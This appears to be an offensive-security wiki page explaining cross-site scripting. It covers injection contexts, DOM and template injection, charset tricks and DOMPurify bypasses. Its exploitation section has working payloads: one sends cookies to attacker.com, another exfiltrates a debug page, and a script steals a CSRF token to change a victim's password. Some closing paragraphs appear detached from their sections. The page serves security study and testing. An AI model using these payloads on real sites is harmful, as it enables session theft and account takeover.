
Cross-Site Scripting (XSS)

Inject JavaScript code on victims to perform actions on their behalf




Description

Cross-Site Scripting (XSS) is a very broad topic, but it revolves around one idea: executing malicious JavaScript. This is often from an attacker's site, hence "Cross-Site" scripting. A common distinction made between types of XSS is:

  • Reflected XSS: HTML is injected via a parameter that is reflected directly on the target page. The payload is not stored and is only seen by whoever visits the malicious URL

  • Stored XSS: A payload is stored somewhere and later loaded insecurely, placing the injected HTML directly onto the page. The difference here is that the payload is saved on the server side in some way, and is later retrieved by a victim

  • DOM XSS: A special variant not using HTML, but rather the Document Object Model (DOM) in JavaScript code itself. When malicious data ends up in JavaScript "sinks" that are able to execute code, such as location = "javascript:...", the payload is triggered via the DOM. The payload may still be either reflected or stored, but it is often called DOM XSS

The most basic form of XSS looks like this. Imagine a page that takes some parameter as input, and reflects it back in the response without any filtering:

<?php echo $_GET["html"];

The intention might be that we can write some styled code like <b>hello</b> to write in bold, but instead, an attacker can use a tag like <script> to include JavaScript code:

http://example.com/page?html=<script>alert(document.cookie)</script>

This will place the document.cookie value (all your Cookies, like session tokens) in a simple alert() box that pops up on your screen. This is a common proof-of-concept to show an attacker is able to access and possibly exfiltrate a user's cookies in order to impersonate them.
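The reflection above can be simulated offline to confirm the payload survives untouched (a minimal JavaScript sketch of the PHP snippet; renderPage() is a hypothetical name):

```javascript
// Hypothetical simulation of the vulnerable PHP page: the "html"
// parameter is concatenated into the response without any encoding
function renderPage(htmlParam) {
  return "<html><body>" + htmlParam + "</body></html>";
}

// Intended use: styled text
console.log(renderPage("<b>hello</b>"));

// Malicious use: the script tag is reflected as-is and would execute
const response = renderPage("<script>alert(document.cookie)</script>");
console.log(response.includes("<script>alert(document.cookie)</script>"));  // true
```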

Contexts

There are a few different places where your input might end up inside HTML to create dynamic pages. Here are a few common examples:

Tag context
<p>INJECTION_HERE</p>
Attribute context
<img src="INJECTION_HERE">
Script context
<script>
    let a = "INJECTION_HERE";
</script>

Depending on the context, you will need different syntax to do the following steps:

  1. Escape the original code, by closing tags (eg. </textarea>) or strings (" or ')

  2. Write the JavaScript payload that will execute

  3. Possibly fix the rest of the code that normally comes after, to prevent errors

Taking the Attribute context as an example, we could exploit it by 1. escaping with a " that closes off the string, then 2. adding our own attribute like onerror=alert() to execute a function when the image fails to load, and finally 3. ending with something meaningless like x=" that will consume the trailing quote. Altogether it could look like this:

<img src="INJECTION_HERE">
Payload: " onerror=alert() x="
<img src="" onerror=alert() x="">

When this is rendered to the page, the image with src="" will likely fail to load as the current page is not an image. Then the onerror= handler is triggered to pop an alert box open, and the tag is closed cleanly. This is the basic idea for all JavaScript Injections. The following sections will explore the various contexts in more detail.
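The three steps can be checked by simulating the server-side template in JavaScript (renderImg() is a hypothetical name):

```javascript
// Hypothetical server template: user input lands inside the src attribute
function renderImg(input) {
  return '<img src="' + input + '">';
}

// 1. " closes the string, 2. onerror= adds an event handler,
// 3. x=" consumes the trailing quote left behind by the template
const payload = '" onerror=alert() x="';
console.log(renderImg(payload));  // <img src="" onerror=alert() x="">
```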

HTML Injection

With zero protections, the simplest-to-understand injection is:

<script>alert()</script>

This starts JavaScript syntax using the <script> tag, and executes the alert() function. There are however a few caveats that will result in this payload not always working. The most important is the difference between server-inserted code and client-inserted code. When the server inserts your script into the HTML, the browser doesn't know any better and trusts the code so it will be run as if it is part of the first original page. When instead the code is possibly fetched and then inserted by some other client-side JavaScript code like element.innerHTML = "<script>...", it will be inserted after the document has already loaded, and follow some different rules. For one, inline scripts like these won't execute directly, as well as some other elements that are not directly loaded after they have been inserted into the DOM.

Because of the above reasons, it is often a safer idea to use a common payload like:

<img src onerror=alert()>

The special thing about this payload is that an image should be loaded, which the browser really wants to do as soon as it is inserted, even on the client side. This causes the onerror= handler to instantly trigger consistently, no matter how it is inserted (read more details in #triggers). In some cases a common variation is the following:

<!-- Shortest payload -->
<svg onload=alert()>
<!-- Short but universal -->
<style onload=alert()>

The small difference between these two payloads is that the first works everywhere except when client-inserted in Firefox, while the second works everywhere and remains relatively short.

Special Tags

When inserted into the content of a <textarea>, JavaScript code won't be directly executed in any way. Therefore you need to first close this specific tag using </textarea>, and then continue with a regular XSS payload like normal.

<!-- Doesn't execute -->
<textarea><img src onerror=alert()></textarea>
<!-- Does execute! -->
<textarea></textarea><img src onerror=alert()></textarea>

Common Filter Bypasses

While the payloads above are simple, they are also the most common, and many filters already recognize these patterns as malicious and block or sanitize your payload in some way. This topic is explored more in Filter Bypasses, but a few of the best tricks are shown here. The first applies when a RegEx pattern like <[^>]*> expects a > to close a tag; the closing > can often be omitted because a later tag will close it for you:

Payload
<style onload=alert() x=
Context
<p><style onload=alert() x=</p>
<!-- Dynamically set href= attribute using SVG animation, with "javascript:" partially in attribute value -->
<svg><a><animate attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://example.com?&semi;javascript:alert(origin)&semi;0" /><text x=20 y=20>XSS</text></a>

<!-- Using iframe srcdoc= attribute to include encoded HTML -->
<iframe srcdoc="&lt;img src=1 o&#110;error=alert(1)&gt;"></iframe>

<!-- Link requiring user interaction with javascript: URL -->
<a href="&#106avas&#99ript:alert()">Click me!</a>

One last payload is a less well-known tag called <base> which takes an href= attribute that will decide where any relative URLs will start from. If you set this to your domain for example, and later in the document a <script src="/some/file.js"> is loaded, it will instead be loaded from your website at the path of the script.

<base href=//xss.jorianwoltjer.com>

<!-- Any normal relative script after this payload will be taken from the base -->
<script src="/some/file.js">
<!-- ^^ Will fetch 'http://xss.jorianwoltjer.com/some/file.js' instead -->

See Filter Bypasses for a more broad approach to make your own bypass.

In case you really can't get a full-blown XSS, check out what other impactful things you may be able to do with HTML Injection.

Alternative Impact

Attribute Injection

While HTML Injection is easy when you are injecting directly into a tag's contents, sometimes the injection point is inside a tag's attribute instead:

<img src="INJECTION_HERE">
<img src='INJECTION_HERE'>
<img src=INJECTION_HERE>

This is a blessing and a curse because it might look harder at first, but this actually opens up some new attack ideas that might not have been possible before. Of course, the same HTML Injection idea from before works just as well, if we close the attribute and start writing HTML:

Payload: "><style onload=alert()>
<img src=""><style onload=alert()>">

However, this is not always possible as the < and > characters are often HTML encoded like &lt; and &gt; to make them represent data, not code. This would not allow us to close the <img> tag or open a new tag to add an event handler to, but in this case we don't need it! Since we are already in an <img> tag, we can simply add an attribute to it with a JavaScript event handler that will trigger:

Payload: " onerror=alert() x="
<img src="" onerror=alert() x="">

The same idea works with other tags and event handlers, for example an <input> element that is automatically focused:

<input value="INJECTION_HERE">
Payload: " onfocus=alert() autofocus x="
<input value="" onfocus=alert() autofocus x="">

Script Injection

A special case is when the injection is found inside of a <script> tag. This may be done by developers when they want to give JavaScript access to some data, often JSON or a string, without requiring another request to fetch that data. When implemented without enough sanitization, however, this can be very dangerous as tags might not even be needed to reach XSS.

<script>
    let a = "INJECTION_HERE";
</script>

As always, one possibility is simply closing the context and starting an HTML Injection. This is common with JSON stringification: while the string itself may be safely encoded, you can still close the surrounding script tag:

Payload: </script><style onload=alert()>
<script>
    let a = "</script><style onload=alert()>";
</script>

If these < or > characters are blocked or encoded, however, we need to be more clever. Similarly to Attribute Injection, we can close only the string and then write arbitrary JavaScript code, because we are already in a <script> block. Using the - subtraction operator, JavaScript needs to evaluate both sides of the expression, so after seeing the empty "" string it will run the alert() function. Finally, we end with a comment to prevent SyntaxErrors:

Payload: "-alert()//
<script>
    let a = ""-alert()//"";
</script>

Another special place you might find yourself injecting into is template literals, surrounded by ` backticks, which allow variables and expressions to be evaluated inside of the string. This opens up more possible syntax to run arbitrary JavaScript without even having to escape the string:

Payload: ${alert()}
<script>
    let a = `${alert()}`;
</script>
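Both script-context escapes can be verified offline by eval()'ing the rendered code with a harmless stand-in for alert() (a sketch; the render functions and pwn() are hypothetical names):

```javascript
// Hypothetical server templates placing input in a string / template literal
const renderString = input => 'let a = "' + input + '";';
const renderTemplate = input => "let a = `" + input + "`;";

let calls = 0;
function pwn() { calls++; }  // stand-in for alert()

eval(renderString('"-pwn()//'));   // becomes: let a = ""-pwn()//";
eval(renderTemplate("${pwn()}"));  // becomes: let a = `${pwn()}`;
console.log(calls);  // 2 - both payloads executed
```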

Double Injection \ backslash trick

One last trick is useful when you cannot escape the string with just a " quote, but when you do have two injections on the same line.

Failed attempt
Payload 1: "-alert()//
Payload 2: something
<script>
    let a = {first: "&quot;-alert()//", second: "something"};
</script>
Injection causes error
Payload 1: anything\
Payload 2: something
<script>
    let a = {first: "anything\", second: "something"};
</script>

The critical part here is that the backslash escapes the quote that would normally end the first string, so the quote that was meant to start the second string now ends the first string instead. Afterwards, the parser is in regular JavaScript context, starting directly with our second input, which no longer needs to escape anything. If we now write valid JavaScript here, it will execute (note that we also have to close the }):

Success
Payload 1: anything\
Payload 2: -alert()}//
<script>
    let a = {first: "anything\", second: "-alert()}//"};
</script>
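This double injection can be verified offline in the same way (a sketch; render() and pwn() are hypothetical stand-ins for the server template and alert()):

```javascript
// Hypothetical template with two injection points on the same line
function render(p1, p2) {
  return 'let a = {first: "' + p1 + '", second: "' + p2 + '"};';
}

let called = false;
function pwn() { called = true; }  // stand-in for alert()

// Payload 1 ends with a backslash, swallowing the first string's closing
// quote; payload 2 is then parsed as plain JavaScript
const code = render("anything\\", "-pwn()}//");
console.log(code);  // let a = {first: "anything\", second: "-pwn()}//"};
eval(code);
console.log(called);  // true
```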

Escaped / bypass using <!-- comment

When injecting into a script tag that disallows quotes ("), you may quickly jump to injecting </script> to close the whole script tag and start a new one with your payload. If the / character is not allowed, however, you cannot close the script tag in this way.

Vulnerable
<script>
  console.log("");
</script>
<input type="text" value="">
Exploit
<script>
  console.log("<!--<script>");
</script>
<input type="text" value="--></script><script>alert()</script>">

Notice that the closing script tag on line 3 doesn't close the script anymore; only after the closing --> comment inside of the attribute is it allowed to close again. By then closing it ourselves from inside the attribute, we end up in an HTML context and can write any XSS payload!

For more advanced tricks and pitfalls, check out the JavaScript page!

DOM XSS

This is slightly different than previous "injection" ideas and is more focused on what special syntax can make certain "sinks" execute JavaScript code.

The Document Object Model (DOM) is JavaScript's view of the HTML on a page. To create complex logic and interactivity with elements on the page there are some functions in JavaScript that allow you to interact with it. As a simple example, the document.getElementById() function can find an element with a specific id= attribute, on which you can then access properties like .innerHTML:

<p id="hello">Hello, <b>world</b>!</p>
<script>
    let element = document.getElementById("hello");
    console.log(element.innerHTML);  // "Hello, <b>world</b>!"
</script>

DOM XSS is where an attacker can abuse the interactivity with HTML functions from within JavaScript by providing sources that contain a payload, which end up in sinks where a payload may trigger. A common example is setting the .innerHTML property of an element, which replaces all HTML children of that element with the string you set. If an attacker controls any part of this without sanitization, they can perform HTML Injection just as if it was reflected by the server. A payload like the following would instantly trigger an alert():

<p id="hello">Hello, world!</p>
<script>
    let element = document.getElementById("hello");
    element.innerHTML = "<img src onerror=alert()>";
</script>

When any of this controllable data ends up in a sink without enough sanitization, you might have an XSS on your hands. Just like contexts, different sinks require different payloads. A location = sink for example, can be exploited using the javascript:alert() protocol to evaluate the code, and an eval() sink could require escaping the context like in Script Injection.

Note: A special less-known property is window.name, which is surprisingly also cross-origin writable. If this value is used in any sink, you can simply open the target in an iframe or window as shown below and set the .name property on it!

JQuery - $()

A special case is made for JQuery as it is still to this day a popular library used by many applications to ease DOM manipulation from JavaScript. The $() selector can find an element on the page with a similar syntax to the more verbose but native document.querySelector() function (CSS Selectors). It would make sense that these selectors would be safe, but if unsanitized user input finds its way into the selector string of this $ function, it will actually lead to XSS as .innerHTML is used under the hood!

Old vulnerable example
$(window).on('hashchange', function() {
    var element = $(location.hash);
    element[0].scrollIntoView();
});

If the target allows being iframed, a simple way to exploit this is by loading the target and changing the src= attribute after it loads:

Using iframe
<iframe src="https://target.com/#" onload="this.src+='<img src onerror=alert()>'">
Using window
<button onclick=start()>Start</button>
<script>
    function start() {  // Open a new tab
        let target = open("https://target.com/#");
        setTimeout(function () {  // Wait for target to load
            target.location = "https://target.com/#<img src onerror=alert()>";
        }, 2000);
    }
</script>

Important to note is that the vulnerable $(location.hash) code above is no longer exploitable in recent versions of JQuery, because an extra rule was added: selectors starting with # are not allowed to contain HTML. Anything else is still vulnerable, however. A snippet like the one below still works in modern versions because the selector is not prefixed with #, and the payload is URL-decoded, allowing the required special characters. Context does not matter here; simply putting <img src onerror=alert()> anywhere in the selector will work.

Modern vulnerable example
let hash = decodeURIComponent(window.location.hash.slice(1));
$(`h2:contains(${hash})`);

JQuery also has many other methods and CVEs if malicious input ends up in specific functions. Make sure to check all functions your input travels through for possible DOM XSS.

Triggers (HTML sinks)

  1. .innerHTML
    let div = document.createElement("div")
    div.innerHTML = "<img src onerror=alert()>"
  2. .innerHTML + DOM
    let div = document.createElement("div")
    document.body.appendChild(div)
    div.innerHTML = "<img src onerror=alert()>"
  3. write()
    document.write("<img src onerror=alert()>")
  4. open() write() close()
    document.open()
    document.write("<img src onerror=alert()>")
    document.close()

When placing common XSS payloads in the triggers above, it becomes clear that they are not all the same. Most notably, the <img src onerror=alert()> payload is the most universal as it works in every situation, even when the element is not added to the DOM yet. The common and short <svg onload=alert()> payload is interesting as it is only triggered via .innerHTML on Chrome, and not Firefox. Lastly, the <script> tag does not load when added with .innerHTML at all.

Client-Side Template Injection

Templating frameworks help fill out HTML with user data and try to make interaction easier. While this often helps with auto-escaping special characters, it can hurt in some other ways when the templating language itself can be injected without HTML tags, or using normally safe HTML that isn't sanitized.

AngularJS is a common web framework for the frontend. It allows easy interactivity by adding special attributes and syntax that it recognizes and executes. This also exposes some new ways for HTML/Text injections to execute arbitrary JavaScript if regular ways are blocked. One caveat is that all these injections need to happen inside an element with an ng-app attribute to enable this feature.

Here are a few examples of how it can be abused on the latest version. All alerts fire on load:

<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.3/angular.min.js"></script>

<body ng-app>
  <!-- Text injection -->
  {{constructor.constructor('alert(1)')()}}
  <!-- Attribute injection -->
  <ANY ng-init="constructor.constructor('alert(2)')()"></ANY>
  <!-- Filter bypass (even DOMPurify!) -->
  <ANY data-ng-init="constructor.constructor('alert(3)')()"></ANY>
  <ANY class="ng-init:constructor.constructor('alert(4)')()"></ANY>
  <ANY class="AAA;ng-init:constructor.constructor('alert(5)')()"></ANY>
  <ANY class="AAA!ng-init:constructor.constructor('alert(6)')()"></ANY>
  <ANY class="AAA♩♬♪ng-init:constructor.constructor('alert(7)')()"></ANY>
  <!-- Dynamic content insertion also vulnerable (only during load) -->
  <script>
    document.body.innerHTML += `<ANY ng-init="constructor.constructor('alert(8)')()"></ANY>`;
  </script>
</body>
<!-- Everything also works under `data-ng-app`, fully bypassing DOMPurify! -->
<div data-ng-app>
  ...
  <b data-ng-init="constructor.constructor('alert(9)')()"></b>
</div>

In some older versions of AngularJS, there was a sandbox preventing some of these arbitrary code executions. Every version has been bypassed, however, leading to how it is now without any sandbox. See the following page for a history of these older sandboxes:

Warning:

Newer versions of Angular (v2+) instead of AngularJS (v1) are not vulnerable in this way. Read more about this in Angular.

Note: Injecting content with .innerHTML does not always work, because it is only triggered when AngularJS loads. If you inject content later from a fetch, for example, it would not trigger even if a parent contains ng-app.

Vue (v2) is similarly exploitable through its template expressions:

<script src="https://cdn.jsdelivr.net/npm/vue@2.5.13/dist/vue.js"></script>

<div id="app">
  <p>{{this.constructor.constructor('alert(1)')()}}</p>
  <p>{{this.$el.ownerDocument.defaultView.alert(2)}}</p>
</div>
<script>
  new Vue({
    el: "#app",
  });
</script>
The htmx library also evaluates JavaScript from its special attributes:

<script src="https://unpkg.com/htmx.org@1.9.12"></script>

<!-- Old syntax, simple eval -->
<img src="x" hx-on="error:alert(1)" />
<!-- Normally impossible elements allow injecting JavaScript into eval'ed function! -->
<meta hx-trigger="x[1)}),alert(2);//]" />
<div hx-disable>
  <!-- Inside hx-disable, new syntax still works -->
  <img src="x" hx-on:error="alert(3)" />
  <!-- Everything can be prefixed with data-, bypassing DOMPurify! -->
  <img src="x" data-hx-on:error="alert(4)" />
</div>

Alternative Charsets

Note: In this section, some ESC characters are replaced with \x1b for clarity. You can copy a real ESC control character from the code block below:



If a response contains either of the following two lines, it is safe from the following attack.

Safe
Content-Type: text/html; charset=utf-8
...
<meta charset="UTF-8">

If this charset is missing, however, things get interesting. Browsers automatically detect encodings in this scenario. The ISO-2022-JP encoding has the following special escape sequences:

Escape Sequence    Meaning
\x1b(B             switch to ASCII (default)
\x1b(J             switch to JIS X 0201 1976 (backslash swapped)
\x1b$@             switch to JIS X 0208 1978 (2 bytes per char)
\x1b$B             switch to JIS X 0208 1983 (2 bytes per char)

These sequences can be used at any point in the HTML context (not JavaScript) and instantly switch how the browser maps bytes to characters. JIS X 0201 1976 is almost the same as ASCII, except for \ being replaced with ¥, and ~ replaced with ‾.
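These switches can be observed with a WHATWG TextDecoder, which implements the same ISO-2022-JP state machine as browsers (assuming a Node.js build with full ICU, the default):

```javascript
// ESC ( J switches to JIS X 0201 1976, where byte 0x5C (backslash)
// decodes to ¥ instead; ESC ( B switches back to plain ASCII
const decoder = new TextDecoder("iso-2022-jp");
const bytes = Buffer.from("\x1b(J\\roman\x1b(Bascii\\", "latin1");

console.log(decoder.decode(bytes));  // ¥romanascii\
```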

1. Negating Backslash Escaping

For the first attack, we can make \ characters useless after writing \x1b(J. Strings inside <script> tags are often protected by escaping quotes with backslashes, so this can bypass such protections.

2. Breaking HTML Context

The JIS X 0208 1978 and JIS X 0208 1983 charsets are useful for a different kind of attack. They turn sequences of 2 bytes into 1 character, effectively obfuscating any characters that would normally come after the switch. This continues until another escape sequence resets the encoding, such as switching back to ASCII.

An example is if you have control over some value in an attribute that is later closed with a double quote ("). By inserting this switching escape sequence, the succeeding bytes including this closing double quote will become invalid Unicode, and lose their meaning.

By later in a different context ending the obfuscation with a reset to ASCII escape sequence, we will still be in the attribute context for HTML's sake. The text that was sanitized as text before, is now put into an attribute which can cause all sorts of issues.

When the next image tag is parsed, an unexpected scenario arises: its opening tag is actually still part of the attribute value, and the quote that opens its first attribute instead closes the existing one.

The 1.png string then ends up as the name of an attribute instead of a value. If we write onerror=alert(1)// here instead, a malicious attribute is added that will execute JavaScript without being sanitized:

This technique can also trivially bypass any server-side XSS protection (eg. DOMPurify) such as in the following challenge:

Payload
<img src="src\x1b$@">text\x1b(B<img src="onerror=alert()//">
const html = `<img src="src\x1b$@">text\x1b(B<img src="onerror=alert(origin)//">`;
const blob = new Blob([html], { type: "text/html" });  // missing charset here
window.open(URL.createObjectURL(blob));  // opened in another top-level context

The charset will not be heuristically detected in every context. The top-most same-origin frame decides, so if the blob URL above were iframed, for example, the exploit wouldn't work: the parent frame's charset is inherited by the iframe, and it won't be detected again.

Exploitation

Making an alert() pop up is cool, but to show impact it might be necessary to exploit what an XSS or JavaScript execution gives you. In summary, you can do almost everything a user can do themselves, but do it for them. You can click buttons, request pages, post data, etc., which opens up a large field of impact, depending on what the application lets the user do.

From another site

The easiest case is Reflected XSS, which triggers when a specific URL is visited. If a victim visits your page, you can simply redirect them to the malicious URL to trigger the XSS:

Example attacker page
<script>
    location = "https://target.com/endpoint?xss=<style onload=alert()>"
</script>

For Stored XSS, a more likely scenario might be someone else stumbling upon the payload by using the site normally, but if the location is known by the attacker they can also redirect a victim to it in the same way as Reflected XSS as shown above.

Some exploits require more complex interaction between the attacker and the target site, like <iframe>'ing (only if #content-security-policy-csp and X-Frame-Options allow it) or opening windows (only when handling user interaction, like pressing a button with onclick=).

Stealing Cookies

In the early days of XSS, this was often the goal of exploitation: session cookies could be stolen and exfiltrated to an attacker, who could then impersonate the victim on demand. This is done with the document.cookie variable that contains all cookies as a string. Then, using fetch(), a request containing this data can be made to the attacker's server to read it remotely:

fetch("http://attacker.com/leak?cookie=" + document.cookie)

Pretty often, however, modern frameworks will set the httpOnly flag on cookies, which means they are not available to JavaScript, only when making HTTP requests. The document.cookie variable will simply not contain cookies carrying this flag, meaning they cannot be exfiltrated directly. The possibilities do not end there, though: you can still make requests using those cookies from within JavaScript, just not read them directly.

In very restricted scenarios you might not be able to make an outbound connection due to the connect-src #content-security-policy-csp directive. See that chapter for ideas on how to still exfiltrate data.

Forcing requests - fetch()

One idea to still steal cookies would be to request a page that responds with the cookie information in some way, like a debug or error page. You can then request this via JavaScript fetch() and exfiltrate the response:

Payload
fetch("http://target.com/debug")  // Perform request
    .then(res => res.text())      // Read response as text
    .then(res => fetch("http://attacker.com/leak?" + res));
Logs of attacker.com
"GET /leak?session=... HTTP/1.1" 404 -

Tip: For more complex data, you can use btoa(res) to Base64 encode the data which makes sure no special characters are included, which you can later decode
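A quick sketch of that tip, with atob() playing the attacker's decoding step:

```javascript
// Base64-encode the stolen response so newlines and quotes survive the URL
// (+, / and = may still need encodeURIComponent() on top)
const res = 'session=abc123; theme="dark"\nsecond line';
const leaked = btoa(res);  // append this to the attacker URL instead of raw text

// Attacker side: decode the exfiltrated value again
console.log(atob(leaked) === res);  // true
```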

A more common way of exploitation is by requesting personal data from a settings page or API route, which works in a very similar way as shown above.

Performing actions

Payload
fetch("http://target.com/api/change_password", {
    method: "POST",
    headers: {
        "Content-Type": "application/json",
        "X-Custom-Header": "anything"
    },
    body: JSON.stringify({
        "password": "hacked",
        "confirm_password": "hacked"
    })
})
HTTP Request
POST /api/change_password HTTP/1.1
Host: target.com
Cookie: session=...
X-Custom-Header: anything
Content-Type: application/json
Content-Length: 49

{"password":"hacked","confirm_password":"hacked"}

Due to fetch() only being a simple function call, you can create a very complex sequence of actions in JavaScript code to execute on the victim, as some actions require some setup. You could create an API token using one request, and then use it in the next to perform some API call. Or a more common example is fetching a Cross-Site Request Forgery (CSRF) token from some form, and then using that token to POST data if it is protected in that way. As you can see, CSRF tokens do not protect against XSS:

fetch("http://target.com/login")  // Request to some form with CSRF token
    .then(res => res.text())
    .then(res => {
        // Extract CSRF token
        const csrf_token = res.match(/<input type="hidden" name="csrf_token" value="(.*)" \/>/)[1];
        // Build password reset form data
        const form = new FormData();
        form.append("csrf_token", csrf_token);
        form.append("password", "hacked");
        form.append("confirm_password", "hacked");

        // Perform another request with leaked token
        fetch("http://target.com/change_password", {
            method: "POST",
            body: form
        });
    });

Tip: If there is no CSRF token, you may also be able to send SameSite=Strict cookies from another subdomain that you have XSS on to the target, because they are considered same-site. Read more about this in Cross-Site Request Forgery (CSRF).

HTML Injection

With JavaScript execution, you can also perform all the tricks explained in the page below, with impact such as leaking the current URL, leaking content on the page, or phishing password managers:

history.replaceState(null, null, "/login");

Protections

XSS is a well-known issue, and many protections try to limit its possibility on websites. There are basically two cases a website needs to handle when reflecting a user's content:

  1. Content, but no HTML is allowed (almost all data)

  2. Limited HTML tags are allowed (rich text like editors)

The 1st case is very easily protected by using HTML encoding. Many frameworks already do this by default, and explicitly make you write extra code to turn it off. Most often this encodes only the special characters, like < to &lt;, > to &gt;, and " to &quot;. While this type of protection is completely safe in most cases, some situations exist where these specific characters are not required to achieve XSS. We've seen examples of Attribute Injection where a ' single quote is used instead, which may not be encoded and can thus be escaped, or where your attribute is not enclosed in quotes at all and a simple space character can add another malicious attribute. With Script Injection it is a similar story, as well as with DOM XSS.
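
Such encoding is a small amount of string work. Below is a minimal sketch of it (a hypothetical helper, not any particular framework's implementation), which also illustrates the gap mentioned above: single quotes are left alone.

```javascript
// Minimal HTML-encoding sketch (hypothetical helper, not a framework's real code)
function escapeHtml(untrusted) {
  return untrusted
    .replace(/&/g, "&amp;")   // must be first, or the other escapes get double-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
  // note: ' is NOT encoded here, so single-quoted attributes remain escapable
}

console.log(escapeHtml(`<img src=x onerror="alert()">`));
// &lt;img src=x onerror=&quot;alert()&quot;&gt;
```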

One common protection is a Content-Security-Policy: response header, which can protect against various client-side attacks by restricting which resources may be "trusted" and executed:

Filter Bypasses

Some of the most useful and common filter bypasses are shown in Common Filter Bypasses.

If a server is checking your input for suspicious strings, it will have a hard time, as there are many ways to obfuscate your payloads. Even a simple <a href=...> tag has many places where the browser allows special and unexpected characters, which may break the pattern the server is trying to search for. Here is a clear diagram showing where you can insert which characters:

The XSS Cheat Sheet by PortSwigger has an extremely comprehensive list of all possible tags, attributes, and browsers that allow JavaScript execution, with varying levels of user interaction:

You can use the above list to filter certain tags you know are allowed/blocked, and copy all payloads for fuzzing using a tool to find what gets through a filter.

JavaScript payload

In case you are able to inject JavaScript correctly but the filter blocks your JavaScript payload, there are many tricks to still achieve code execution. One of them is the location variable, which can be assigned a javascript: URL just like in DOM XSS. This makes for a very simple function call trigger, as we don't need parentheses or backticks: they can be escaped in a string as \x28 and \x29.

location="javascript:alert\x28\x29"
JavaScript Payload
location=name
Attacker's page
<script>
  name = "javascript:alert()";
  window.open("https://target.com/?xss=location%3Dname", "_self");
  // use of "_self" doesn't require interaction, and works on Firefox
</script>

Mutation XSS & DOMPurify

Mutation XSS is a special kind of XSS payload that abuses a difference between the checking environment and the destination environment. Browsers have special parsing rules for HTML inside certain tags that differ from the rules inside other tags. This difference can sometimes be abused to create a payload that is benign in the checking context, but is mutated by the browser into a malicious payload in a different context.

I went into detail on this technique in late 2024, and explain the ideas in the blog post below, together with some new tricks:

DOMPurify
<p id="</title><img src=x onerror=alert()>"></p>

There is a <p> tag with "</title><img src=x onerror=alert()>" as its id= attribute, nothing more, and surely nothing that would trigger JavaScript. But then along comes the browser, which sees this payload placed into the DOM, inside an existing <title> tag:

Browser DOM
<title>
    <p id="</title><img src=x onerror=alert()>"></p>
</title>

Perhaps surprisingly, it is parsed differently now that it is inside of the <title> tag. Instead of a simple <p> tag with an id= attribute, this turned into the following after mutation:

Browser DOM after mutation
<html><head><title>
    &lt;p id="</title></head><body><img src="x" onerror="alert()">"&gt;<p></p>
</body></html>

See what happened here? It suddenly closed with the </title> tag and started an <img> tag with the malicious onerror= attribute, executing JavaScript, and causing XSS! This means in the following example, alert(1) fires but alert(2) does not:

Demo
<title>
    <p id="</title><img src=x onerror=alert(1)>"></p>
</title>
<p id="</title><img src=x onerror=alert(2)>"></p>

DOMPurify does not know of the <title> tag the application puts it in later, so it can only say if the HTML is safe on its own. In this case, it is, so we bypass the check through Mutation XSS.

A quick for-loop later, we find that this same syntax works for all of these tags: iframe, noembed, noframes, noscript, script, style, textarea, title, xmp

These types of Mutation XSS tricks are highly useful for bypassing simpler sanitizer parsers, considering even DOMPurify had to put in real effort to get this far. Payloads that hide the real XSS in an attribute and use mutation to escape out of it can be unexpected; developers may not have thought of the possibility and may rely on regexes or naive parsing.

Where this gets really powerful is in combination with HTML encoding, if the sanitizer parses the payload and then reassembles the HTML afterward. For example:

<title><p id="&lt;&sol;title&gt;&lt;img src&equals;x onerror&equals;alert&lpar;&rpar;&gt;"></p></title>
<!-- could be serialized back into this Mutation XSS -->
<title><p id="</title><img src=x onerror=alert()>"></p></title>

<svg>
    a<style><!--</style><a id="--!><img src=x onerror=alert()>"></a>
</svg>

This is another DOMPurify "bypass" with a more realistic threat: all a developer needs to do is place your payload inside an <svg> tag, without the <svg> tag being part of the sanitized input. This payload is a bit more complicated, so here's a breakdown. The trick is the difference between SVG parsing and HTML parsing. In the HTML that DOMPurify sees, the <style> tag is special: it switches the parsing context to CSS, which doesn't support comments, so <!-- won't be interpreted as one. Therefore the </style> closes it, and <a id="..."> opens another innocent tag and attribute. DOMPurify doesn't notice anything wrong here and won't alter the input. In SVG, however, the <style> tag doesn't exist and is interpreted like any other invalid tag; its children may be more tags, in this case a <!-- comment. This comment only ends at the start of the <a id="--!> attribute, which means that after the comment comes raw HTML again. Our <img onerror=> tag is then parsed for real, and the JavaScript executes!

Tip: Instead of a comment, another possibility is using the special <![CDATA[ ... ]] syntax in SVGs that abuses a similar parsing difference:

<svg>
    a<style><![CDATA[</style><a id="]]><img src=x onerror=alert()>"></a>
</svg>

DOMPurify outdated versions

DOMPurify 2.2.3 Bypass
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src onerror=alert(origin)>">

Earlier Proof of Concepts:

For the latest news and configuration-dependent bypasses, check out the changelog:

Resources

For more tricks and finding your own custom vectors, check out the following cheatsheet and tool:

It is common for dangerous tags to be blacklisted, and any event handler attributes like onload and onerror to be blocked. There are some payloads, however, that can encode data to hide these obligatory strings (&#110; = HTML-encoded n):
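
As a sketch of this idea: the browser decodes HTML entities inside attribute values before using them, so encoding every character of a value hides it from naive string filters. The helper below is hypothetical, but the output is a working payload shape:

```javascript
// Encode every character of a string as a decimal HTML entity (sketch).
// Entities are decoded in attribute *values*, so "alert()" can be hidden
// from naive string matching while still executing in the handler.
function htmlEntityEncode(s) {
  return [...s].map(c => `&#${c.codePointAt(0)};`).join("");
}

const payload = `<img src=x onerror="${htmlEntityEncode("alert()")}">`;
console.log(payload);
// <img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#41;">
```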

To exploit and show a proof of concept of the above trick, I set up a domain that returns the same script for every path, with any payload you put into the URL hash. This means you can include this injection anywhere, and put a JavaScript payload after the # symbol of the target URL, which will then be executed:

Styles using CSS can also be dangerous: not only to restyle the page, but with selectors and URLs, secrets on the page like CSRF tokens or other private data can be exfiltrated. For details on exploiting this, see this introduction, an improved version using @import, and finally this tool.

The same goes for ' single quotes and no quotes at all, which just need spaces to separate attributes. Using the PortSwigger XSS Cheat Sheet, you can filter for possible triggers of JavaScript using attributes on your specific tag and look at the payloads. Some of these will require user interaction, like onclick=, but others won't. A useful trick with <input> tags specifically is the onfocus= attribute together with the autofocus attribute, which combine into a payload requiring no user interaction.

The important piece of knowledge is that any character can be escaped using a \ backslash, which makes the character be interpreted as data instead of code (see the spec for a table of all special backslash escapes). With this knowledge, we know that \" continues the string instead of closing it. Therefore, if we end our input with a \ character, the " quote appended after it, which would normally close the string, instead continues it and messes up the syntax:
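
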